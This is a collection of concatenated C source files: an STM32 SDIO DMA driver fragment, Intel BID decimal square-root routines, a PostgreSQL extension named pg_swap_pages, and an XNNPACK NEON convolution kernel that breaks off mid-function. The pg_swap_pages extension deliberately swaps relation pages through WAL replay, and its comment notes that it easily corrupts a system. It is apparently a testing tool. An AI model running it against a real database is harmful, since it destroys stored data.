PD.02 CMD line */ GPIO_InitStructure.GPIO_Pin = GPIO_Pin_2; GPIO_Init(GPIOD, &GPIO_InitStructure); /* Configure PC.12 pin: CLK pin */ GPIO_InitStructure.GPIO_Pin = GPIO_Pin_12; GPIO_InitStructure.GPIO_PuPd = GPIO_PuPd_NOPULL; GPIO_Init(GPIOC, &GPIO_InitStructure); /* Enable the SDIO APB2 Clock */ RCC_APB2PeriphClockCmd(RCC_APB2Periph_SDIO, ENABLE); /* Enable the DMA2 Clock */ RCC_AHB1PeriphClockCmd(SD_SDIO_DMA_CLK, ENABLE); } /** * @brief Configures the DMA2 Channel4 for SDIO Tx request. * @param BufferSRC: pointer to the source buffer * @param BufferSize: buffer size * @retval None */ void SD_LowLevel_DMA_TxConfig(uint32_t *BufferSRC, uint32_t BufferSize) { DMA_InitTypeDef SDDMA_InitStructure; DMA_ClearFlag(SD_SDIO_DMA_STREAM, SD_SDIO_DMA_FLAG_FEIF | SD_SDIO_DMA_FLAG_DMEIF | SD_SDIO_DMA_FLAG_TEIF | SD_SDIO_DMA_FLAG_HTIF | SD_SDIO_DMA_FLAG_TCIF); /* DMA2 Stream3 or Stream6 disable */ DMA_Cmd(SD_SDIO_DMA_STREAM, DISABLE); /* DMA2 Stream3 or Stream6 Config */ DMA_DeInit(SD_SDIO_DMA_STREAM); SDDMA_InitStructure.DMA_Channel = SD_SDIO_DMA_CHANNEL; SDDMA_InitStructure.DMA_PeripheralBaseAddr = (uint32_t)SDIO_FIFO_ADDRESS; SDDMA_InitStructure.DMA_Memory0BaseAddr = (uint32_t)BufferSRC; SDDMA_InitStructure.DMA_DIR = DMA_DIR_MemoryToPeripheral; SDDMA_InitStructure.DMA_BufferSize = BufferSize; SDDMA_InitStructure.DMA_PeripheralInc = DMA_PeripheralInc_Disable; SDDMA_InitStructure.DMA_MemoryInc = DMA_MemoryInc_Enable; SDDMA_InitStructure.DMA_PeripheralDataSize = DMA_PeripheralDataSize_Word; SDDMA_InitStructure.DMA_MemoryDataSize = DMA_MemoryDataSize_Word; SDDMA_InitStructure.DMA_Mode = DMA_Mode_Normal; SDDMA_InitStructure.DMA_Priority = DMA_Priority_VeryHigh; SDDMA_InitStructure.DMA_FIFOMode = DMA_FIFOMode_Enable; SDDMA_InitStructure.DMA_FIFOThreshold = DMA_FIFOThreshold_Full; SDDMA_InitStructure.DMA_MemoryBurst = DMA_MemoryBurst_INC4; SDDMA_InitStructure.DMA_PeripheralBurst = DMA_PeripheralBurst_INC4; DMA_Init(SD_SDIO_DMA_STREAM, &SDDMA_InitStructure); DMA_ITConfig(SD_SDIO_DMA_STREAM, DMA_IT_TC, ENABLE); DMA_FlowControllerConfig(SD_SDIO_DMA_STREAM, DMA_FlowCtrl_Peripheral); /* DMA2 Stream3 or Stream6 enable */ DMA_Cmd(SD_SDIO_DMA_STREAM, ENABLE); } /** * @brief Configures the DMA2 Channel4 for SDIO Rx request. * @param BufferDST: pointer to the destination buffer * @param BufferSize: buffer size * @retval None */ void SD_LowLevel_DMA_RxConfig(uint32_t *BufferDST, uint32_t BufferSize) { DMA_InitTypeDef SDDMA_InitStructure; DMA_ClearFlag(SD_SDIO_DMA_STREAM, SD_SDIO_DMA_FLAG_FEIF | SD_SDIO_DMA_FLAG_DMEIF | SD_SDIO_DMA_FLAG_TEIF | SD_SDIO_DMA_FLAG_HTIF | SD_SDIO_DMA_FLAG_TCIF); /* DMA2 Stream3 or Stream6 disable */ DMA_Cmd(SD_SDIO_DMA_STREAM, DISABLE); /* DMA2 Stream3 or Stream6 Config */ DMA_DeInit(SD_SDIO_DMA_STREAM); SDDMA_InitStructure.DMA_Channel = SD_SDIO_DMA_CHANNEL; SDDMA_InitStructure.DMA_PeripheralBaseAddr = (uint32_t)SDIO_FIFO_ADDRESS; SDDMA_InitStructure.DMA_Memory0BaseAddr = (uint32_t)BufferDST; SDDMA_InitStructure.DMA_DIR = DMA_DIR_PeripheralToMemory; SDDMA_InitStructure.DMA_BufferSize = BufferSize; SDDMA_InitStructure.DMA_PeripheralInc = DMA_PeripheralInc_Disable; SDDMA_InitStructure.DMA_MemoryInc = DMA_MemoryInc_Enable; SDDMA_InitStructure.DMA_PeripheralDataSize = DMA_PeripheralDataSize_Word; SDDMA_InitStructure.DMA_MemoryDataSize = DMA_MemoryDataSize_Word; SDDMA_InitStructure.DMA_Mode = DMA_Mode_Normal; SDDMA_InitStructure.DMA_Priority = DMA_Priority_VeryHigh; SDDMA_InitStructure.DMA_FIFOMode = DMA_FIFOMode_Enable; SDDMA_InitStructure.DMA_FIFOThreshold = DMA_FIFOThreshold_Full; SDDMA_InitStructure.DMA_MemoryBurst = DMA_MemoryBurst_INC4; SDDMA_InitStructure.DMA_PeripheralBurst = DMA_PeripheralBurst_INC4; DMA_Init(SD_SDIO_DMA_STREAM, &SDDMA_InitStructure); DMA_ITConfig(SD_SDIO_DMA_STREAM, DMA_IT_TC, ENABLE); DMA_FlowControllerConfig(SD_SDIO_DMA_STREAM, DMA_FlowCtrl_Peripheral); /* DMA2 Stream3 or Stream6 enable */ DMA_Cmd(SD_SDIO_DMA_STREAM, ENABLE); } /************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/
487066.c
/****************************************************************************** Copyright (c) 2007-2011, Intel Corp. All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of Intel Corporation nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ******************************************************************************/ #define BID_128RES #define BID_FUNCTION_SETS_BINARY_FLAGS #include "bid_internal.h" #include "bid_sqrt_macros.h" BID128_FUNCTION_ARG1 (bid128_sqrt, x) BID_UINT256 M256, C256, C4, C8; BID_UINT128 CX, CX1, CX2, A10, S2, T128, TP128, CS, CSM, res; BID_UINT64 sign_x, Carry; BID_SINT64 D; int_float fx, f64; int exponent_x, bin_expon_cx; int digits, scale, exponent_q; BID_OPT_SAVE_BINARY_FLAGS() // unpack arguments, check for NaN or Infinity if (!unpack_BID128_value (&sign_x, &exponent_x, &CX, x)) { res.w[1] = CX.w[1]; res.w[0] = CX.w[0]; // NaN ? if ((x.w[1] & 0x7c00000000000000ull) == 0x7c00000000000000ull) { #ifdef BID_SET_STATUS_FLAGS if ((x.w[1] & 0x7e00000000000000ull) == 0x7e00000000000000ull) // sNaN __set_status_flags (pfpsf, BID_INVALID_EXCEPTION); #endif res.w[1] = CX.w[1] & QUIET_MASK64; BID_RETURN (res); } // x is Infinity? if ((x.w[1] & 0x7800000000000000ull) == 0x7800000000000000ull) { res.w[1] = CX.w[1]; if (sign_x) { // -Inf, return NaN res.w[1] = 0x7c00000000000000ull; #ifdef BID_SET_STATUS_FLAGS __set_status_flags (pfpsf, BID_INVALID_EXCEPTION); #endif } BID_RETURN (res); } // x is 0 otherwise res.w[1] = sign_x | ((((BID_UINT64) (exponent_x + DECIMAL_EXPONENT_BIAS_128)) >> 1) << 49); res.w[0] = 0; BID_RETURN (res); } if (sign_x) { res.w[1] = 0x7c00000000000000ull; res.w[0] = 0; #ifdef BID_SET_STATUS_FLAGS __set_status_flags (pfpsf, BID_INVALID_EXCEPTION); #endif BID_RETURN (res); } #ifdef UNCHANGED_BINARY_STATUS_FLAGS // (void) fegetexceptflag (&binaryflags, BID_FE_ALL_FLAGS); #endif // 2^64 f64.i = 0x5f800000; // fx ~ CX fx.d = (float) CX.w[1] * f64.d + (float) CX.w[0]; bin_expon_cx = ((fx.i >> 23) & 0xff) - 0x7f; digits = bid_estimate_decimal_digits[bin_expon_cx]; A10 = CX; if (exponent_x & 1) { A10.w[1] = (CX.w[1] << 3) | (CX.w[0] >> 61); A10.w[0] = CX.w[0] << 3; CX2.w[1] = (CX.w[1] << 1) | (CX.w[0] >> 63); CX2.w[0] = CX.w[0] << 1; __add_128_128 (A10, A10, CX2); } CS.w[0] = short_sqrt128 (A10); CS.w[1] = 0; // check for exact result if (CS.w[0] * CS.w[0] == A10.w[0]) { __mul_64x64_to_128_fast (S2, CS.w[0], CS.w[0]); if (S2.w[1] == A10.w[1]) // && S2.w[0]==A10.w[0]) { bid_get_BID128_very_fast (&res, 0, (exponent_x + DECIMAL_EXPONENT_BIAS_128) >> 1, CS); #ifdef UNCHANGED_BINARY_STATUS_FLAGS // (void) fesetexceptflag (&binaryflags, BID_FE_ALL_FLAGS); #endif BID_RETURN (res); } } // get number of digits in CX D = CX.w[1] - bid_power10_index_binexp_128[bin_expon_cx].w[1]; if (D > 0 || (!D && CX.w[0] >= bid_power10_index_binexp_128[bin_expon_cx].w[0])) digits++; // if exponent is odd, scale coefficient by 10 scale = 67 - digits; exponent_q = exponent_x - scale; scale += (exponent_q & 1); // exp. bias is even if (scale > 38) { T128 = bid_power10_table_128[scale - 37]; __mul_128x128_low (CX1, CX, T128); TP128 = bid_power10_table_128[37]; __mul_128x128_to_256 (C256, CX1, TP128); } else { T128 = bid_power10_table_128[scale]; __mul_128x128_to_256 (C256, CX, T128); } // 4*C256 C4.w[3] = (C256.w[3] << 2) | (C256.w[2] >> 62); C4.w[2] = (C256.w[2] << 2) | (C256.w[1] >> 62); C4.w[1] = (C256.w[1] << 2) | (C256.w[0] >> 62); C4.w[0] = C256.w[0] << 2; bid_long_sqrt128 (&CS, C256); //printf("C256=%016I64x %016I64x %016I64x %016I64x, CS=%016I64x %016I64x \n",C256.w[3],C256.w[2],C256.w[1],C256.w[0],CS.w[1],CS.w[0]); #ifndef IEEE_ROUND_NEAREST #ifndef IEEE_ROUND_NEAREST_TIES_AWAY if (!((rnd_mode) & 3)) { #endif #endif // compare to midpoints CSM.w[1] = (CS.w[1] << 1) | (CS.w[0] >> 63); CSM.w[0] = (CS.w[0] + CS.w[0]) | 1; // CSM^2 //__mul_128x128_to_256(M256, CSM, CSM); __sqr128_to_256 (M256, CSM); if (C4.w[3] > M256.w[3] || (C4.w[3] == M256.w[3] && (C4.w[2] > M256.w[2] || (C4.w[2] == M256.w[2] && (C4.w[1] > M256.w[1] || (C4.w[1] == M256.w[1] && C4.w[0] > M256.w[0])))))) { // round up CS.w[0]++; if (!CS.w[0]) CS.w[1]++; } else { C8.w[1] = (CS.w[1] << 3) | (CS.w[0] >> 61); C8.w[0] = CS.w[0] << 3; // M256 - 8*CSM __sub_borrow_out (M256.w[0], Carry, M256.w[0], C8.w[0]); __sub_borrow_in_out (M256.w[1], Carry, M256.w[1], C8.w[1], Carry); __sub_borrow_in_out (M256.w[2], Carry, M256.w[2], 0, Carry); M256.w[3] = M256.w[3] - Carry; // if CSM' > C256, round up if (M256.w[3] > C4.w[3] || (M256.w[3] == C4.w[3] && (M256.w[2] > C4.w[2] || (M256.w[2] == C4.w[2] && (M256.w[1] > C4.w[1] || (M256.w[1] == C4.w[1] && M256.w[0] > C4.w[0])))))) { // round down if (!CS.w[0]) CS.w[1]--; CS.w[0]--; } } #ifndef IEEE_ROUND_NEAREST #ifndef IEEE_ROUND_NEAREST_TIES_AWAY } else { __sqr128_to_256 (M256, CS); C8.w[1] = (CS.w[1] << 1) | (CS.w[0] >> 63); C8.w[0] = CS.w[0] << 1; if (M256.w[3] > C256.w[3] || (M256.w[3] == C256.w[3] && (M256.w[2] > C256.w[2] || (M256.w[2] == C256.w[2] && (M256.w[1] > C256.w[1] || (M256.w[1] == C256.w[1] && M256.w[0] > C256.w[0])))))) { __sub_borrow_out (M256.w[0], Carry, M256.w[0], C8.w[0]); __sub_borrow_in_out (M256.w[1], Carry, M256.w[1], C8.w[1], Carry); __sub_borrow_in_out (M256.w[2], Carry, M256.w[2], 0, Carry); M256.w[3] = M256.w[3] - Carry; M256.w[0]++; if (!M256.w[0]) { M256.w[1]++; if (!M256.w[1]) { M256.w[2]++; if (!M256.w[2]) M256.w[3]++; } } if (!CS.w[0]) CS.w[1]--; CS.w[0]--; if (M256.w[3] > C256.w[3] || (M256.w[3] == C256.w[3] && (M256.w[2] > C256.w[2] || (M256.w[2] == C256.w[2] && (M256.w[1] > C256.w[1] || (M256.w[1] == C256.w[1] && M256.w[0] > C256.w[0])))))) { if (!CS.w[0]) CS.w[1]--; CS.w[0]--; } } else { __add_carry_out (M256.w[0], Carry, M256.w[0], C8.w[0]); __add_carry_in_out (M256.w[1], Carry, M256.w[1], C8.w[1], Carry); __add_carry_in_out (M256.w[2], Carry, M256.w[2], 0, Carry); M256.w[3] = M256.w[3] + Carry; M256.w[0]++; if (!M256.w[0]) { M256.w[1]++; if (!M256.w[1]) { M256.w[2]++; if (!M256.w[2]) M256.w[3]++; } } if (M256.w[3] < C256.w[3] || (M256.w[3] == C256.w[3] && (M256.w[2] < C256.w[2] || (M256.w[2] == C256.w[2] && (M256.w[1] < C256.w[1] || (M256.w[1] == C256.w[1] && M256.w[0] <= C256.w[0])))))) { CS.w[0]++; if (!CS.w[0]) CS.w[1]++; } } // RU? if ((rnd_mode) == BID_ROUNDING_UP) { CS.w[0]++; if (!CS.w[0]) CS.w[1]++; } } #endif #endif #ifdef BID_SET_STATUS_FLAGS __set_status_flags (pfpsf, BID_INEXACT_EXCEPTION); #endif bid_get_BID128_fast (&res, 0, (exponent_q + DECIMAL_EXPONENT_BIAS_128) >> 1, CS); #ifdef UNCHANGED_BINARY_STATUS_FLAGS // (void) fesetexceptflag (&binaryflags, BID_FE_ALL_FLAGS); #endif BID_RETURN (res); } BID128_FUNCTION_ARGTYPE1 (bid128d_sqrt, BID_UINT64, x) BID_UINT256 M256, C256, C4, C8; BID_UINT128 CX, CX1, CX2, A10, S2, T128, TP128, CS, CSM, res; BID_UINT64 sign_x, Carry; BID_SINT64 D; int_float fx, f64; int exponent_x, bin_expon_cx; int digits, scale, exponent_q; BID_OPT_SAVE_BINARY_FLAGS() // unpack arguments, check for NaN or Infinity // unpack arguments, check for NaN or Infinity CX.w[1] = 0; if (!unpack_BID64 (&sign_x, &exponent_x, &CX.w[0], x)) { res.w[1] = CX.w[0]; res.w[0] = 0; // NaN ? if ((x & 0x7c00000000000000ull) == 0x7c00000000000000ull) { #ifdef BID_SET_STATUS_FLAGS if ((x & SNAN_MASK64) == SNAN_MASK64) // sNaN __set_status_flags (pfpsf, BID_INVALID_EXCEPTION); #endif res.w[0] = (CX.w[0] & 0x0003ffffffffffffull); __mul_64x64_to_128 (res, res.w[0], bid_power10_table_128[18].w[0]); res.w[1] |= ((CX.w[0]) & 0xfc00000000000000ull); BID_RETURN (res); } // x is Infinity? if ((x & 0x7800000000000000ull) == 0x7800000000000000ull) { if (sign_x) { // -Inf, return NaN res.w[1] = 0x7c00000000000000ull; #ifdef BID_SET_STATUS_FLAGS __set_status_flags (pfpsf, BID_INVALID_EXCEPTION); #endif } BID_RETURN (res); } // x is 0 otherwise exponent_x = exponent_x - DECIMAL_EXPONENT_BIAS + DECIMAL_EXPONENT_BIAS_128; res.w[1] = sign_x | ((((BID_UINT64) (exponent_x + DECIMAL_EXPONENT_BIAS_128)) >> 1) << 49); res.w[0] = 0; BID_RETURN (res); } if (sign_x) { res.w[1] = 0x7c00000000000000ull; res.w[0] = 0; #ifdef BID_SET_STATUS_FLAGS __set_status_flags (pfpsf, BID_INVALID_EXCEPTION); #endif BID_RETURN (res); } #ifdef UNCHANGED_BINARY_STATUS_FLAGS // (void) fegetexceptflag (&binaryflags, BID_FE_ALL_FLAGS); #endif exponent_x = exponent_x - DECIMAL_EXPONENT_BIAS + DECIMAL_EXPONENT_BIAS_128; // 2^64 f64.i = 0x5f800000; // fx ~ CX fx.d = (float) CX.w[1] * f64.d + (float) CX.w[0]; bin_expon_cx = ((fx.i >> 23) & 0xff) - 0x7f; digits = bid_estimate_decimal_digits[bin_expon_cx]; A10 = CX; if (exponent_x & 1) { A10.w[1] = (CX.w[1] << 3) | (CX.w[0] >> 61); A10.w[0] = CX.w[0] << 3; CX2.w[1] = (CX.w[1] << 1) | (CX.w[0] >> 63); CX2.w[0] = CX.w[0] << 1; __add_128_128 (A10, A10, CX2); } CS.w[0] = short_sqrt128 (A10); CS.w[1] = 0; // check for exact result if (CS.w[0] * CS.w[0] == A10.w[0]) { __mul_64x64_to_128_fast (S2, CS.w[0], CS.w[0]); if (S2.w[1] == A10.w[1]) { bid_get_BID128_very_fast (&res, 0, (exponent_x + DECIMAL_EXPONENT_BIAS_128) >> 1, CS); #ifdef UNCHANGED_BINARY_STATUS_FLAGS // (void) fesetexceptflag (&binaryflags, BID_FE_ALL_FLAGS); #endif BID_RETURN (res); } } // get number of digits in CX D = CX.w[1] - bid_power10_index_binexp_128[bin_expon_cx].w[1]; if (D > 0 || (!D && CX.w[0] >= bid_power10_index_binexp_128[bin_expon_cx].w[0])) digits++; // if exponent is odd, scale coefficient by 10 scale = 67 - digits; exponent_q = exponent_x - scale; scale += (exponent_q & 1); // exp. bias is even if (scale > 38) { T128 = bid_power10_table_128[scale - 37]; __mul_128x128_low (CX1, CX, T128); TP128 = bid_power10_table_128[37]; __mul_128x128_to_256 (C256, CX1, TP128); } else { T128 = bid_power10_table_128[scale]; __mul_128x128_to_256 (C256, CX, T128); } // 4*C256 C4.w[3] = (C256.w[3] << 2) | (C256.w[2] >> 62); C4.w[2] = (C256.w[2] << 2) | (C256.w[1] >> 62); C4.w[1] = (C256.w[1] << 2) | (C256.w[0] >> 62); C4.w[0] = C256.w[0] << 2; bid_long_sqrt128 (&CS, C256); #ifndef IEEE_ROUND_NEAREST #ifndef IEEE_ROUND_NEAREST_TIES_AWAY if (!((rnd_mode) & 3)) { #endif #endif // compare to midpoints CSM.w[1] = (CS.w[1] << 1) | (CS.w[0] >> 63); CSM.w[0] = (CS.w[0] + CS.w[0]) | 1; // CSM^2 //__mul_128x128_to_256(M256, CSM, CSM); __sqr128_to_256 (M256, CSM); if (C4.w[3] > M256.w[3] || (C4.w[3] == M256.w[3] && (C4.w[2] > M256.w[2] || (C4.w[2] == M256.w[2] && (C4.w[1] > M256.w[1] || (C4.w[1] == M256.w[1] && C4.w[0] > M256.w[0])))))) { // round up CS.w[0]++; if (!CS.w[0]) CS.w[1]++; } else { C8.w[1] = (CS.w[1] << 3) | (CS.w[0] >> 61); C8.w[0] = CS.w[0] << 3; // M256 - 8*CSM __sub_borrow_out (M256.w[0], Carry, M256.w[0], C8.w[0]); __sub_borrow_in_out (M256.w[1], Carry, M256.w[1], C8.w[1], Carry); __sub_borrow_in_out (M256.w[2], Carry, M256.w[2], 0, Carry); M256.w[3] = M256.w[3] - Carry; // if CSM' > C256, round up if (M256.w[3] > C4.w[3] || (M256.w[3] == C4.w[3] && (M256.w[2] > C4.w[2] || (M256.w[2] == C4.w[2] && (M256.w[1] > C4.w[1] || (M256.w[1] == C4.w[1] && M256.w[0] > C4.w[0])))))) { // round down if (!CS.w[0]) CS.w[1]--; CS.w[0]--; } } #ifndef IEEE_ROUND_NEAREST #ifndef IEEE_ROUND_NEAREST_TIES_AWAY } else { __sqr128_to_256 (M256, CS); C8.w[1] = (CS.w[1] << 1) | (CS.w[0] >> 63); C8.w[0] = CS.w[0] << 1; if (M256.w[3] > C256.w[3] || (M256.w[3] == C256.w[3] && (M256.w[2] > C256.w[2] || (M256.w[2] == C256.w[2] && (M256.w[1] > C256.w[1] || (M256.w[1] == C256.w[1] && M256.w[0] > C256.w[0])))))) { __sub_borrow_out (M256.w[0], Carry, M256.w[0], C8.w[0]); __sub_borrow_in_out (M256.w[1], Carry, M256.w[1], C8.w[1], Carry); __sub_borrow_in_out (M256.w[2], Carry, M256.w[2], 0, Carry); M256.w[3] = M256.w[3] - Carry; M256.w[0]++; if (!M256.w[0]) { M256.w[1]++; if (!M256.w[1]) { M256.w[2]++; if (!M256.w[2]) M256.w[3]++; } } if (!CS.w[0]) CS.w[1]--; CS.w[0]--; if (M256.w[3] > C256.w[3] || (M256.w[3] == C256.w[3] && (M256.w[2] > C256.w[2] || (M256.w[2] == C256.w[2] && (M256.w[1] > C256.w[1] || (M256.w[1] == C256.w[1] && M256.w[0] > C256.w[0])))))) { if (!CS.w[0]) CS.w[1]--; CS.w[0]--; } } else { __add_carry_out (M256.w[0], Carry, M256.w[0], C8.w[0]); __add_carry_in_out (M256.w[1], Carry, M256.w[1], C8.w[1], Carry); __add_carry_in_out (M256.w[2], Carry, M256.w[2], 0, Carry); M256.w[3] = M256.w[3] + Carry; M256.w[0]++; if (!M256.w[0]) { M256.w[1]++; if (!M256.w[1]) { M256.w[2]++; if (!M256.w[2]) M256.w[3]++; } } if (M256.w[3] < C256.w[3] || (M256.w[3] == C256.w[3] && (M256.w[2] < C256.w[2] || (M256.w[2] == C256.w[2] && (M256.w[1] < C256.w[1] || (M256.w[1] == C256.w[1] && M256.w[0] <= C256.w[0])))))) { CS.w[0]++; if (!CS.w[0]) CS.w[1]++; } } // RU? if ((rnd_mode) == BID_ROUNDING_UP) { CS.w[0]++; if (!CS.w[0]) CS.w[1]++; } } #endif #endif #ifdef BID_SET_STATUS_FLAGS __set_status_flags (pfpsf, BID_INEXACT_EXCEPTION); #endif bid_get_BID128_fast (&res, 0, (exponent_q + DECIMAL_EXPONENT_BIAS_128) >> 1, CS); #ifdef UNCHANGED_BINARY_STATUS_FLAGS // (void) fesetexceptflag (&binaryflags, BID_FE_ALL_FLAGS); #endif BID_RETURN (res); }
428824.c
/*------------------------------------------------------------------------- * * pg_swap_pages.c * Extension switching pages of a relation via WAL replay. * * Copyright (c) 1996-2021, PostgreSQL Global Development Group * * IDENTIFICATION * pg_swap_pages/pg_swap_pages.c * *------------------------------------------------------------------------- */ #include "postgres.h" #include "fmgr.h" #include "access/generic_xlog.h" #include "access/heapam.h" #include "storage/bufmgr.h" #include "storage/bufpage.h" #include "utils/relcache.h" PG_MODULE_MAGIC; /* * Switch pages of a relation and WAL-log it. Corrupts easily a system. */ PG_FUNCTION_INFO_V1(pg_swap_pages); Datum pg_swap_pages(PG_FUNCTION_ARGS) { Oid relid = PG_GETARG_OID(0); uint32 blkno1 = PG_GETARG_UINT32(1); uint32 blkno2 = PG_GETARG_UINT32(2); Relation rel; Buffer buf1, buf2; Page page1, page2; char raw_page[BLCKSZ]; GenericXLogState *state; rel = relation_open(relid, AccessShareLock); /* Some sanity checks */ if (blkno1 > MaxBlockNumber) ereport(ERROR, (errcode(ERRCODE_INVALID_PARAMETER_VALUE), errmsg("invalid block number 1"))); if (blkno2 > MaxBlockNumber) ereport(ERROR, (errcode(ERRCODE_INVALID_PARAMETER_VALUE), errmsg("invalid block number 2"))); if (blkno1 >= RelationGetNumberOfBlocksInFork(rel, MAIN_FORKNUM)) ereport(ERROR, (errcode(ERRCODE_INVALID_PARAMETER_VALUE), errmsg("block number 1 %u is out of range for relation \"%s\"", blkno1, RelationGetRelationName(rel)))); if (blkno2 >= RelationGetNumberOfBlocksInFork(rel, MAIN_FORKNUM)) ereport(ERROR, (errcode(ERRCODE_INVALID_PARAMETER_VALUE), errmsg("block number 2 %u is out of range for relation \"%s\"", blkno2, RelationGetRelationName(rel)))); /* Take copy of buffer 1 */ buf1 = ReadBufferExtended(rel, MAIN_FORKNUM, blkno1, RBM_NORMAL, NULL); LockBuffer(buf1, BUFFER_LOCK_SHARE); /* And buffer 2 */ buf2 = ReadBufferExtended(rel, MAIN_FORKNUM, blkno2, RBM_NORMAL, NULL); LockBuffer(buf2, BUFFER_LOCK_SHARE); /* Now generate WAL records registering both buffers and swapping them */ state = GenericXLogStart(rel); page1 = GenericXLogRegisterBuffer(state, buf1, GENERIC_XLOG_FULL_IMAGE); page2 = GenericXLogRegisterBuffer(state, buf2, GENERIC_XLOG_FULL_IMAGE); /* Switch the pages' contents */ memcpy(raw_page, page1, BLCKSZ); memcpy(page1, page2, BLCKSZ); memcpy(page2, raw_page, BLCKSZ); /* Time to log the changes */ GenericXLogFinish(state); /* cleanup and finish */ LockBuffer(buf1, BUFFER_LOCK_UNLOCK); LockBuffer(buf2, BUFFER_LOCK_UNLOCK); ReleaseBuffer(buf1); ReleaseBuffer(buf2); relation_close(rel, AccessShareLock); PG_RETURN_NULL(); }
56821.c
// Auto-generated file. Do not edit! // Template: src/f32-dwconv/up-neon.c.in // Generator: tools/xngen // // Copyright 2019 Google LLC // // This source code is licensed under the BSD-style license found in the // LICENSE file in the root directory of this source tree. #include <assert.h> #include <arm_neon.h> #include <xnnpack/dwconv.h> void xnn_f32_dwconv_ukernel_up4x9__neonfma( size_t channels, size_t output_width, const float** input, const float* weights, float* output, size_t input_stride, size_t output_increment, const union xnn_f32_output_params params[restrict static 1]) { assert(channels != 0); assert(output_width != 0); const float32x4_t vmax = vld1q_dup_f32(&params->scalar.max); const float32x4_t vmin = vld1q_dup_f32(&params->scalar.min); do { const float* i0 = input[0]; assert(i0 != NULL); const float* i1 = input[1]; assert(i1 != NULL); const float* i2 = input[2]; assert(i2 != NULL); const float* i3 = input[3]; assert(i3 != NULL); const float* i4 = input[4]; assert(i4 != NULL); const float* i5 = input[5]; assert(i5 != NULL); const float* i6 = input[6]; assert(i6 != NULL); const float* i7 = input[7]; assert(i7 != NULL); const float* i8 = input[8]; assert(i8 != NULL); input = (const float**) ((uintptr_t) input + input_stride); size_t c = channels; const float* w = weights; for (; c >= 4; c -= 4) { float32x4_t vacc0123p0 = vld1q_f32(w); w += 4; const float32x4_t vi0x0123 = vld1q_f32(i0); i0 += 4; const float32x4_t vk0x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi0x0123, vk0x0123); const float32x4_t vi1x0123 = vld1q_f32(i1); i1 += 4; const float32x4_t vk1x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi1x0123, vk1x0123); const float32x4_t vi2x0123 = vld1q_f32(i2); i2 += 4; const float32x4_t vk2x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi2x0123, vk2x0123); const float32x4_t vi3x0123 = vld1q_f32(i3); i3 += 4; const float32x4_t vk3x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi3x0123, vk3x0123); const float32x4_t vi4x0123 = vld1q_f32(i4); i4 += 4; const float32x4_t vk4x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi4x0123, vk4x0123); const float32x4_t vi5x0123 = vld1q_f32(i5); i5 += 4; const float32x4_t vk5x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi5x0123, vk5x0123); const float32x4_t vi6x0123 = vld1q_f32(i6); i6 += 4; const float32x4_t vk6x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi6x0123, vk6x0123); const float32x4_t vi7x0123 = vld1q_f32(i7); i7 += 4; const float32x4_t vk7x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi7x0123, vk7x0123); const float32x4_t vi8x0123 = vld1q_f32(i8); i8 += 4; const float32x4_t vk8x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi8x0123, vk8x0123); float32x4_t vacc0123 = vmaxq_f32(vacc0123p0, vmin); vacc0123 = vminq_f32(vacc0123, vmax); vst1q_f32(output, vacc0123); output += 4; } if XNN_UNLIKELY(c != 0) { float32x4_t vacc0123p0 = vld1q_f32(w); w += 4; const float32x4_t vi0x0123 = vld1q_f32(i0); const float32x4_t vk0x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi0x0123, vk0x0123); const float32x4_t vi1x0123 = vld1q_f32(i1); const float32x4_t vk1x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi1x0123, vk1x0123); const float32x4_t vi2x0123 = vld1q_f32(i2); const float32x4_t vk2x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi2x0123, vk2x0123); const float32x4_t vi3x0123 = vld1q_f32(i3); const float32x4_t vk3x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi3x0123, vk3x0123); const float32x4_t vi4x0123 = vld1q_f32(i4); const float32x4_t vk4x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi4x0123, vk4x0123); const float32x4_t vi5x0123 = vld1q_f32(i5); const float32x4_t vk5x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi5x0123, vk5x0123); const float32x4_t vi6x0123 = vld1q_f32(i6); const float32x4_t vk6x0123 = vld1q_f32(w); w += 4; vacc0123p0 = 